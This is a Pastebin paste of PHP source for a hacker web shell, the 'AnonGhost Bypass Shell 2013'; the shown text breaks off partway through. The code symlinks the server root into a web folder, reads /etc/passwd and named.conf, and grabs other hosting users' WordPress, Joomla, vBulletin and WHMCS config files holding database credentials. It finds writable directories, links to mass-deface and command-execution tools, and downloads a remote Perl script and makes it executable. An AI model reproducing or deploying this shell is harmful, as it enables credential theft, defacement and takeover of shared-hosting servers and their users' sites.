shamp0erna99

AnonGhost2013 by Virusa Worm

Sep 9th, 2020
374
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 84.19 KB | None | 0 0
  1. <?php
  2. ##################################
  3. #   AnonGhost Bypass Shell 2013  #
  4. #       Coded by Virusa Worm     #
  5. ##################################
  6. error_reporting(0);
  7. @set_time_limit(0);
  8. @session_start();
  9. $xSoftware = trim(getenv("SERVER_SOFTWARE"));
  10. $xServerName = $_SERVER["HTTP_HOST"];
  11. $xName = "Virusa Worm";
  12. $mlebu = "a6df8bf9aabd07789c1772de31ebbbde"; //password:w0rm
  13. $jajal = (md5($_POST['pass']));
  14. $rasane = 1;
  15. if ($jajal == $mlebu) {
  16.     $_SESSION['login'] = "$jajal";
  17. }
  18. if ($rasane) {
  19.     if (isset($_SESSION['login']) or $_SESSION['login'] != $mlebu) {
  20.         die("
  21.        
  22. <html>
  23.  <head>
  24.    <title>AnonGhost Bypass Shell 2013</title><link rel=\"shortcut icon\" href=\"http://www.iconj.com/ico/2/j/2j62fbaa2w.ico\" type=\"image/x-icon\" />
  25.    <style type=\"text/css\">
  26.     body { background-color:#151515; color: rgb(0, 153, 0); }
  27.     input{ margin:0;    background-color:#151515; border:0px solid #151515; position:relative; bottom:75px; left:300pt;}
  28.     input, select, textarea{ color: #151515; } textarea:focus, input:focus { color: #151515; }
  29.     .fot{ font-family:Tahoma, Arial, sans-serif; color: #009900 ; font-size: 11pt; }
  30. .cont a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif  ; font-size: 16px; text-shadow: 0px 0px 3px ; }
  31. .cont a:hover{ color: #FF0000 ; text-shadow:0px 0px 3px #ff0000 ;}
  32. #menu a{ padding: 1px; border: 1px solid green; color: green; text-decoration: none;color: #009900; font-family: Tahoma, Geneva, sans-serif; font-size:12px; }
  33. #menu a:hover{ border: 1px solid red; color: red; }
  34.    </style>
  35.     </head><script> function myFunction() {alert(\"Please Login First..!\"); }</script>
  36.  <body>
  37.  <center><img src=\"http://i952.photobucket.com/albums/ae1/virusaworm/ag_zps0e71aa70.jpg\" /></center><br><div id=\"menu\" class=\"cont\" align=\"center\">
  38. <a href=\"\" onclick=\"myFunction()\">&nbsp;Home&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;Symlink&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;Bypass&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;Mass&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;Tools&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;Upload&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;About&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;Logout&nbsp;</a> <a href=\"\" onclick=\"myFunction()\">&nbsp;Kill&nbsp;</a><hr color=#\"006600\" width=\"32%\" /></div>
  39. <br><br><br><center><img src=\"http://i952.photobucket.com/albums/ae1/virusaworm/agh_zps2f4dd68b.jpg\" />
  40. <br><br><font color=\"#006600\" size=\"1pt\">Coded by </font><font  color=\"#00aa00\" size=\"1pt\">Virusa Worm</font> <font color=\"#b0b000\" size=\"1pt\">-</font> <font color=\"#006600\" size=\"1pt\">Idea by </font><font color=\"#009900\" size=\"1pt\">Mauritania Attacker</font><br><br><font color=\"#00aa00\" size=\"1pt\">AnonGhost Bypass </font><font face=\"Tahoma\" color=\"#b3b3b3\" size=\"1pt\">Shell 2013</font> <font color=\"#006600\" size=\"1pt\">include Several script which has recoded to make this shell.</font><br><br><font color=\"#006600\" size=\"1pt\">so.. try to figure it out if this shell not work in different server, and use ur brain.<br>learn to figure it out about something it\'s make be better. mbuh ngomong opo iki.. lol..<br>yen ono seng salah yo tulong dibenerke, tapi yen bener yo ojo disalahke.. kan iso sinau bareng.. wkkwk..<br><br><font color=\"#b0b000\" size=\"1pt\">\"</font>tools not make hacker, but try to learn about tools. tried to find out why it's tool works. it's will be better than nothing.. <font color=\"#b0b000\" size=\"1pt\">\"</font><br><br><br><br><br><font color=\"#006600\" size=\"1pt\">Special thankz to : </font><br><font color=\"#009900\" size=\"1pt\">My best Brother Mauritania Attacker<br><br><br><br><font color=\"#006600\" size=\"1pt\">thankz to : </font><br>
  41. All Members AnonGhost Team - <font color=\"#006600\" size=\"1pt\">[ </font>Tanpa Bicara - Maniak k4Sur </font><font color=\"#006600\" size=\"1pt\">[pasangan galo.. lol..]]</font><br><br>Greetz to :</font><br><font color=\"#b0b000\" size=\"1pt\">AnonGhost - Mauritania HaCker Team - X-Blackerz INC - ZHC - All Muslim Hackers</font><font color=\"#006600\" size=\"1pt\"></center><br><br><center><form method=\"post\"><input type=\"password\" name=\"pass\"></form></center>
  42.       <footer id=\"det\" style=\"position:fixed; left:0px; right:0px; bottom:0px; background:rgb(21,21,21); text-align:center; border-top: 1px solid #009900; border-bottom: 1px solid #009900\"><font color=#009900 size=1 face=\"Tahoma\"><a href=\"https://local-hunter.com\">&copy; AnonGhost Bypass Shell 2013 - Coded by Virusa Worm</a></font></footer>
  43.  </body>
  44. </html>
  45.            ");
  46.     }
  47. }
  48. $pageURL = 'http://' . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
  49. $u = explode("/", $pageURL);
  50. $pageURL = str_replace($u[count($u) - 1], "", $pageURL);
  51. $pageFTP = 'ftp://' . $_SERVER["SERVER_NAME"] . '/public_html/' . $_SERVER["REQUEST_URI"];
  52. $u = explode("/", $pageFTP);
  53. $pageFTP = str_replace($u[count($u) - 1], "", $pageFTP);
  54. function checkAlexa($domain) {
  55.     $clean = explode("/", $domain);
  56.     $result = file_get_contents("http://data.alexa.com/data?cli=10&dat=snbamz&url=http://" . $clean[0]);
  57.     $n = explode("<POPULARITY URL=\"" . $clean[0] . "/\" TEXT=\"", $result);
  58.     @$rest = $n[1];
  59.     $it = explode("\"", $rest);
  60.     $alexa_rank = $it[0];
  61.     if (@$alexa_rank != "") {
  62.         return number_format($alexa_rank);
  63.     } else {
  64.         return "No Alexa";
  65.     }
  66. }
  67. //$symlink_a="T1BUSU9OUyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzIFN5bUxpbmtzSWZPd25lck1hdGNoIEluY2x1ZGVzIEluY2x1ZGVzTk9FWEVDIEV4ZWNDR0kNCk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcw0KRm9yY2VUeXBlIHRleHQvcGxhaW4NCkFkZFR5cGUgdGV4dC9wbGFpbiAucGhwDQpBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwNCkFkZFR5cGUgdGV4dC9odG1sIC5zaHRtbA0KQWRkVHlwZSB0eHQgLnBocA0KQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHANCkFkZEhhbmRsZXIgdHh0IC5waHANCkFkZEhhbmRsZXIgdHh0IC5odG1sDQpBZGRIYW5kbGVyIHR4dCAuc2h0bWwNCk9wdGlvbnMgQWxsDQpPcHRpb25zIEFsbA0KT1BUSU9OUyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzIFN5bUxpbmtzSWZPd25lck1hdGNoIEluY2x1ZGVzIEluY2x1ZGVzTk9FWEVDIEV4ZWNDR0kNCk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcw0KRm9yY2VUeXBlIHRleHQvcGxhaW4NCkFkZFR5cGUgdGV4dC9wbGFpbiAucGhwDQpBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwNCkFkZFR5cGUgdGV4dC9odG1sIC5zaHRtbA0KQWRkVHlwZSB0eHQgLnBocA0KQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHANCkFkZEhhbmRsZXIgdHh0IC5waHANCkFkZEhhbmRsZXIgdHh0IC5odG1sDQpBZGRIYW5kbGVyIHR4dCAuc2h0bWwNCk9wdGlvbnMgQWxsDQpPcHRpb25zIEFsbA==";//
  68.  
  69. ?>
  70.  
  71.  
  72. <html xmlns="http://www.w3.org/1999/xhtml">
  73.  
  74. <head>
  75. <title>AnonGhost Bypass Shell 2013</title><link rel="shortcut icon" href="http://www.iconj.com/ico/2/j/2j62fbaa2w.ico" type="image/x-icon" />
  76.  
  77. <style type="text/css">
  78.   html,body { margin: 0; padding: 0; outline: 0; }
  79. a{ font-size: 12px; }
  80. body { direction: ltr;  background-color:#151515; color: rgb(0, 153, 0); text-align: center } input,textarea,select{ font-weight: bold; color: #000000; }
  81. input,textarea,select:hover{ box-shadow: 0px 0px 4px #00cc00; }
  82. .hedr { font-family: Tahoma, Arial, sans-serif  ;  font-size: 22px; }
  83. .cont a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif  ; font-size: 16px; text-shadow: 0px 0px 3px ; }
  84. .cont a:hover{ color: #FF0000 ;  text-shadow:0px 0px 3px #ff0000 ; }
  85. .cone a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif  ; font-size: 12px; text-shadow: 0px 0px 3px ; }
  86. .cone a:hover{ color: #FF0000 ; text-shadow:0px 0px 3px #ff0000 ; }
  87. .tmp tr td{ border: solid 1px #006600; padding: 2px ; font-size: 13px; }
  88. .tmp tr td a { text-decoration: none; }
  89. .foter{ font-size: 9pt; color: #006600 ; text-align: center }
  90. .tmp tr td:hover{ box-shadow: 0px 0px 4px #00cc00; }
  91. .fot{ font-family:Tahoma, Arial, sans-serif; color: #009900 ; font-size: 11pt; }
  92. .for a : hover{ color: #FF0000 ; text-shadow: 0px 0px 1px #FF0000; }
  93. .ir { color: #FF0000; }
  94. .tul { face:Tahoma, Geneva, sans-serif; font-size: 7pt; }
  95. #menu a{ padding: 1px; border: 1px solid green; color: green; text-decoration: none;color: #009900; font-family: Tahoma, Geneva, sans-serif; font-size:12px; }
  96. #menu a:hover{ border: 1px solid red; color: red; }
  97.  
  98. </style>
  99.  
  100. </head>
  101.  
  102. <body>
  103.  
  104. <div class='all'>
  105.  
  106.  
  107. <?php
  108. @mkdir('sim', 0777);
  109. $htcs = "Options all
  110. DirectoryIndex Sux.html
  111. AddType text/plain .php
  112. AddHandler server-parsed .php
  113. AddType text/plain .html
  114. AddHandler txt .html
  115. Require None
  116. Satisfy Any";
  117. $f = @fopen('sim/.htaccess', 'w');
  118. fwrite($f, $htcs);
  119. @symlink("/", "sim/rut");
  120. $pg = basename('index.php');
  121. echo '<center>' . base64_decode("PGltZyBzcmM9Imh0dHA6Ly9pOTUyLnBob3RvYnVja2V0LmNvbS9hbGJ1bXMvYWUxL3ZpcnVzYXdvcm0vYWdfenBzMGU3MWFhNzAuanBnIiAvPg==") . '</center>';
  122. echo '<div id="menu" class="cont" align="center">
  123. <a href="?">&nbsp;Home&nbsp;</a>
  124. <a href="?vw=sime">&nbsp;Symlink&nbsp;</a>
  125. <a href="?vw=baipas">&nbsp;Bypass&nbsp;</a>
  126. <a href="?vw=mase">&nbsp;Mass&nbsp;</a>
  127. <a href="?vw=tule">&nbsp;Tools&nbsp;</a>
  128. <a href="?vw=aplot">&nbsp;Upload&nbsp;</a>
  129. <a href="?vw=abot">&nbsp;About&nbsp;</a>
  130. <a href="?vw=metu">&nbsp;Logout&nbsp;</a>
  131. <a href="?vw=mati">&nbsp;Kill&nbsp;</a>
  132. </div>
  133.  
  134. <div class="tul"><font color="009900" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
  135. ';
  136. echo '<hr color=#"006600" width="75%">';
  137. if (ini_get('safe_mode') == '1') {
  138.     echo '<font color="#006600"> Safe mode:</font><b class="tul"><font color="red"> ON&nbsp;</font></font></b>|';
  139. } else {
  140.     echo '<font color="#006600"> Safe mode:</font><b class="tul"><font color="00bb00"> OFF&nbsp;</font></b>|';
  141. }
  142. if (ini_get('magic_quotes_gpc') == '1') {
  143.     echo '<font color="#006600"> Magic_quotes_gpc:</font><b class="tul"><font color="red"> ON&nbsp;</font></b>|';
  144. } else {
  145.     echo '<font color="#006600"> Magic_quotes_gpc:</font><b class="tul"><font color="00bb00"> OFF&nbsp;</font></b>|';
  146. }
  147. if (function_exists('mysql_connect')) {
  148.     echo '<font color="#006600"> Mysql:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  149. } else {
  150.     echo '<font color="#006600"> Mysql:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';
  151. }
  152. if (function_exists('mssql_connect')) {
  153.     echo '<font color="#006600"> Mssql:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  154. } else {
  155.     echo '<font color="#006600"> Mssql:</font><b class="tul"><font color="b0b000"> OFF&nbsp;</font></b>|';
  156. }
  157. if (function_exists('pg_connect')) {
  158.     echo '<font color="#006600"> PostgreSQL:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  159. } else {
  160.     echo '<font color="#006600"> PostgreSQL:</font><b class="tul"><font color="b0b000"> OFF&nbsp;</font></b>|';
  161. }
  162. if (function_exists('ocilogon')) {
  163.     echo '<font color="#006600"> Oracle:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  164. } else {
  165.     echo '<font color="#006600"> Oracle:</font><b class="tul"><font color="b0b000"> OFF&nbsp;</font></b>|';
  166. }
  167. if (function_exists('curl_version')) {
  168.     echo '<font color="#006600"> Curl:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  169. } else {
  170.     echo '<font color="#006600"> Curl:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';
  171. }
  172. if (function_exists('exec')) {
  173.     echo '<font color="#006600"> Exec:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  174. } else {
  175.     echo '<font color="#006600"> Exec:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';
  176. }
  177. if (!ini_get('open_basedir') != "on") {
  178.     echo '<font color="#006600"> Open_basedir:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';
  179. } else {
  180.     echo '<font color="#006600"> Open_basedir:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  181. }
  182. if (!ini_get('ini_restore') != "on") {
  183.     echo '<font color="#006600"> Ini_restore:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';
  184. } else {
  185.     echo '<font color="#006600"> Ini_restore:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  186. }
  187. if (function_exists('symlink')) {
  188.     echo '<font color="#006600"> Symlink:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  189. } else {
  190.     echo '<font color="#006600"> Symlink:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';
  191. }
  192. if (function_exists('file_get_contents')) {
  193.     echo '<font color="#006600"> file_get_contents:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  194. } else {
  195.     echo '<font color="#006600"> file_get_contents:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';
  196. }
  197. if (is_dir('sim/rut')) {
  198.     echo '<font color="#006600"> Permission:</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';
  199. } else {
  200.     echo '<font color="#006600"> Permission:</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>';
  201. }
  202. echo '<hr color=#"006600" width="75%"></div>';
  203. if (isset($_REQUEST['vw'])) {
  204.     switch ($_REQUEST['vw']) {
  205.         case 'dose':
  206.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Domains Script</font></b><br><br>';
  207.             if (!@is_file('named.txt')) {
  208.                 $d00m = @file("/etc/named.conf");
  209.             } else {
  210.                 $d00m = @file("named.txt");
  211.             }
  212.             if (!$d00m) {
  213.                 die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
  214.             } else {
  215.                 echo "<div class='tmp'>
  216. <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>Script</b></font> </td>";
  217.                 foreach ($d00m as $dom) {
  218.                     flush();
  219.                     flush();
  220.                     if (eregi("zone", $dom)) {
  221.                         @preg_match_all('#zone "(.*)"#', $dom, $domvw);
  222.                         flush();
  223.                         if (@strlen(trim($domvw[1][0])) > 2) {
  224.                             $user = @posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
  225.                             $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/wp-config.php";
  226.                             $wpp = @get_headers($wpl);
  227.                             $wp = $wpp[0];
  228.                             $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/blog/wp-config.php";
  229.                             $wpp2 = @get_headers($wp2);
  230.                             $wp12 = $wpp2[0];
  231.                             $jo1 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/configuration.php";
  232.                             $joo = @get_headers($jo1);
  233.                             $jo = $joo[0];
  234.                             $jo2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/joomla/configuration.php";
  235.                             $joo2 = @get_headers($jo2);
  236.                             $jo12 = $joo2[0];
  237.                             $vb1 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/includes/config.php";
  238.                             $vbb = @get_headers($vb1);
  239.                             $vb = $vbb[0];
  240.                             $vb2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/vb/includes/config.php";
  241.                             $vbb2 = @get_headers($vb2);
  242.                             $vb12 = $vbb2[0];
  243.                             $vb3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/forum/includes/config.php";
  244.                             $vbb3 = @get_headers($vb3);
  245.                             $vb13 = $vbb3[0];
  246.                             $wh1 = $pageURL . "/sim/rut/home/" . $user['name'] . "public_html/clients/configuration.php";
  247.                             $whh2 = @get_headers($wh1);
  248.                             $wh = $whh2[0];
  249.                             $wh2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/support/configuration.php";
  250.                             $whh2 = @get_headers($wh2);
  251.                             $wh12 = $whh2[0];
  252.                             $wh3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/client/configuration.php";
  253.                             $whh3 = @get_headers($wh3);
  254.                             $wh13 = $whh3[0];
  255.                             $wh5 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/submitticket.php";
  256.                             $whh5 = @get_headers($wh5);
  257.                             $wh15 = $whh5[0];
  258.                             $wh4 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/client/configuration.php";
  259.                             $whh4 = @get_headers($wh4);
  260.                             $wh14 = $whh4[0];
  261.                             $pos = strpos($wp, "200");
  262.                             $config = "&nbsp;";
  263.                             if (strpos($wp, "200") == true) {
  264.                                 $config = "<div class='cone'><a href='" . $wpl . "' target='_blank'>Wordpress</a></div>";
  265.                             } elseif (strpos($wp12, "200") == true) {
  266.                                 $config = "<div class='cone'><a href='" . $wp2 . "' target='_blank'>Wordpress</a></div>";
  267.                             } elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true) {
  268.                                 $config = " <div class='cone'><a href='" . $wh5 . "' target='_blank'>WHMCS</a></div>";
  269.                             } elseif (strpos($wh12, "200") == true) {
  270.                                 $config = "<div class='cone'> <a href='" . $wh2 . "' target='_blank'>WHMCS</a></div>";
  271.                             } elseif (strpos($wh13, "200") == true) {
  272.                                 $config = "<div class='cone'> <a href='" . $wh3 . "' target='_blank'>WHMCS</a></div>";
  273.                             } elseif (strpos($jo, "200") == true) {
  274.                                 $config = " <div class='cone'><a href='" . $jo1 . "' target='_blank'>Joomla</a></div>";
  275.                             } elseif (strpos($jo12, "200") == true) {
  276.                                 $config = " <div class='cone'><a href='" . $jo2 . "' target='_blank'>Joomla</a></div>";
  277.                             } elseif (strpos($vb, "200") == true) {
  278.                                 $config = " <div class='cone'><a href='" . $vb1 . "' target='_blank'>vBulletin</a></div>";
  279.                             } elseif (strpos($vb12, "200") == true) {
  280.                                 $config = " <div class='cone'><a href='" . $vb2 . "' target='_blank'>vBulletin</a></div>";
  281.                             } elseif (strpos($vb13, "200") == true) {
  282.                                 $config = " <div class='cone'><a href='" . $vb3 . "' target='_blank'>vBulletin</a></div>";
  283.                             } else {
  284.                                 continue;
  285.                             }
  286.                             flush();
  287.                             flush();
  288.                             $site = $user['name'];
  289.                             flush();
  290.                             echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . "/>" . $domvw[1][0] . "</a></div></td>
  291. <td><div class='cone'>" . $config . "</div></td></tr>";
  292.                             flush();
  293.                         }
  294.                     }
  295.                 }
  296.             }
  297.             echo "</table></div><br><br>";
  298.         break;
  299.         case 'sime':
  300.             echo '<br><br><br><br><b class="cont" align="center">
  301. <a href="?vw=sym">Symlink Server</a><br><br>
  302. <a href="?vw=dose">Domains Script</a><br><br>
  303. <a href="?vw=vkill">Perl based symlink</a><br><br>
  304. <a href="?vw=file">Symlink Manual</a><br><br>
  305. <a href="?vw=ensim">Enable Symlink</a></b><br>';
  306.         break;
  307.         case 'baipas':
  308.             echo '<br><br><br><br><b class="cont" align="center">
  309. <a href="?vw=passwd">Bypass /etc/passwd</a><br><br>
  310. <a href="?vw=cgipl">Bypassed Perl Security</a><br><br>
  311. <a href="?vw=bforb">Bypass Forbidden</a><br><br>
  312. <a href="?vw=posget">Bypass posix_getpwuid</a><br><br>
  313. <a href="?vw=suphp">Bypass SuPHP</a><br><br>
  314. <a href="?vw=ssi">Ssi Bypasser</a><br><br>
  315. </b>';
  316.         break;
  317.         case 'mase':
  318.             echo '<br><br><br><br><b class="cont" align="center">
  319. <a href="?vw=joomla">Mass Joomla</a><br><br>
  320. <a href="?vw=masde">Mass Deface</a><br><br>
  321. <a href="?vw=vb">Mass vBulletin</a><br><br>
  322. <a href="?vw=wp">Mass WordPress</a></b>';
  323.         break;
  324.         case 'tule':
  325.             echo '<br><br><br><br><b class="cont" align="center">
  326. <a href="?vw=cmd">Command Execution</a><br><br>
  327.  
  328. <a href="?vw=vgrab">Config Grabber</a><br><br>
  329. <a href="?vw=cari">Find Directory Writable/Readable</a><br><br>
  330.  
  331. </b>';
  332.         break;
  333.         case 'cari':
  334.             echo '<center /><br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Find Directory Writable/Readable</b></p><br>' . $end;
  335.             function read_dir($path) {
  336.                 global $count;
  337.                 if ($handle = opendir($path)) {
  338.                     while (false !== ($file = readdir($handle))) {
  339.                         $dr = "$path$file/";
  340.                         if (($file != '.') and ($file != '..') and is_dir($dr)) {
  341.                             if (is_readable($dr) and is_writeable($dr)) {
  342.                                 echo "[RW] " . $dr . "<br>
  343.  
  344. ";
  345.                                 $count++;
  346.                             }
  347.                             read_dir($dr);
  348.                         }
  349.                     }
  350.                 }
  351.             }
  352.             $count = 0;
  353.             set_time_limit(0);
  354.             @$passwd = fopen('/etc/passwd', 'r');
  355.             if (!$passwd) {
  356.                 echo "<center><font color='#ff0000' size='2pt' />[-] No Access to /etc/passwd
  357.  
  358. </center>";
  359.                 exit;
  360.             }
  361.             $path_to_public = array();
  362.             echo "<html><center><font color='#009900' size='2pt' />
  363.  
  364. ";
  365.             while (!feof($passwd)) {
  366.                 $str = fgets($passwd);
  367.                 $pos = strpos($str, ":");
  368.                 $username = substr($str, 0, $pos);
  369.                 $dirz = "/home/$username/public_html/";
  370.                 if (($username != "")) {
  371.                     if (is_readable($dirz)) {
  372.                         array_push($path_to_public, $dirz);
  373.                         if (is_writeable($dirz)) {
  374.                             $count++;
  375.                             echo "<font color=white>[</font><font color=yellow>R</font><font color=green>W</font><font color=white>]</font> " . $dirz . "<br><br><br>
  376.  
  377. ";
  378.                         } else echo "<font color=white>[</font><font color=yellow>R</font><font color=white>]</font> " . $dirz . "<br>
  379.  
  380. ";
  381.                     }
  382.                 }
  383.             }
  384.             echo "<font color=red size=2pt>[+]</font> <font color=#009900 size=2pt>Found </font><font color=yellow size=2pt>" . sizeof($path_to_public) . "</font> <font color=#009900 size=2pt>readable public_html directories.</font><br><br>
  385.  
  386.  
  387. ";
  388.             if (sizeof($path_to_public) != '0') {
  389.                 foreach ($path_to_public as $path) {
  390.                 }
  391.                 echo "<font color=red size=2pt>[+]</font> <font color=#009900 size=2pt>Found</font><font color=yellow size=2pt> " . $count . " </font><font color=#009900 size=2pt>writable directories.</font>
  392.  
  393. ";
  394.                 echo "</center></html>";
  395.             }
  396.             break;
  397.         case 'cgipl':
  398.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Bypassed Perl Security</b>';
  399.             echo '<center><form method=post><br><br>
  400.            <input type=submit name=su value="Bypass" /></form></center>';
  401.             error_reporting(0);
  402.             if (isset($_POST['su'])) {
  403.                 mkdir('wper', 0755);
  404.                 $rr = " Options +ExecCGI
  405.     AddType application/x-httpd-cgi .sh
  406.     AddHandler mod_python .sh
  407.     AddHandler mod_perl .sh
  408.     AddHandler cgi-script .sh
  409.     AddType application/x-httpd-cgi .pl
  410.     AddHandler cgi-script .pl
  411.     AddHandler cgi-script .pl ";
  412.                 $g = fopen('wper/.htaccess', 'w');
  413.                 fwrite($g, $rr);
  414.                 $wper = symlink("/", "wper/vw.pl");
  415.                 mkdir('wper', 0755);
  416.                 $file = file_get_contents('http://www.medico.org/language/en-GB/en-GB.tpl.txt');
  417.                 $g = fopen('wper/vw.pl', 'w');
  418.                 fwrite($g, $file);
  419.                 fclose($g);
  420.                 chmod("vw.pl", 0755);
  421.                 $wper = symlink("/", "wper/vw.pl");
  422.                 fwrite($f, $r);
  423.                 $consym = "<b class='cont' align='center'><a href=wper/vw.pl target='_blank'><font color=#ff0000 size=2 face=\"Courier New\">Click here to open</font></a></b><br>";
  424.                 echo "<center><br><br>Perl Bypassed Successfully<br><br><font color=#58FAF4 size=2 face=\"Courier New\">$consym</font></center>";
  425.             }
  426.             break;
  427.         case 'vgrab':
  428.             echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Configs Grabber</b>"; ?><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#009900" size="2pt">/etc/passwd content</p><form method="POST"><textarea name="passwd" class='output' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="Fvck'em!" type="submit"><br></form></center><br><?php
  429.             }
  430.             if ($_POST['config']) {
  431.                 $function = $functions = @ini_get("disable_functions");
  432.                 if (eregi("symlink", $functions)) {
  433.                     die('<error>Symlink is disabled :( </error>');
  434.                 }
  435.                 @mkdir('vwconfig', 0755);
  436.                 @chdir('vwconfig');
  437.                 $htaccess = "
  438. Options all
  439. Options +Indexes
  440. Options +FollowSymLinks
  441. DirectoryIndex Sux.html
  442. AddType text/plain .php
  443. AddHandler server-parsed .php
  444. AddType text/plain .html
  445. AddHandler txt .html
  446. Require None
  447. Satisfy Any
  448. ";
  449.                 file_put_contents(".htaccess", $htaccess, FILE_APPEND);
  450.                 $passwd = $_POST["passwd"];
  451.                 $passwd = explode("
  452. ", $passwd);
  453.                 echo "<br><br><center><font color=#009900 size=2pt>wait ...</center><br>";
  454.                 foreach ($passwd as $pwd) {
  455.                     $pawd = explode(":", $pwd);
  456.                     $user = $pawd[0];
  457.                     @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  458.                     @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  459.                     @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  460.                     @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  461.                     @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  462.                     @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  463.                     @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  464.                     @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  465.                     @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  466.                     @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  467.                     @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  468.                     @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  469.                     @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  470.                     @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  471.                     @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  472.                     @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
  473.                     @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  474.                     @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  475.                     @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  476.                     @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  477.                     @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  478.                     @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  479.                     @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  480.                     @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  481.                     @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  482.                     @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
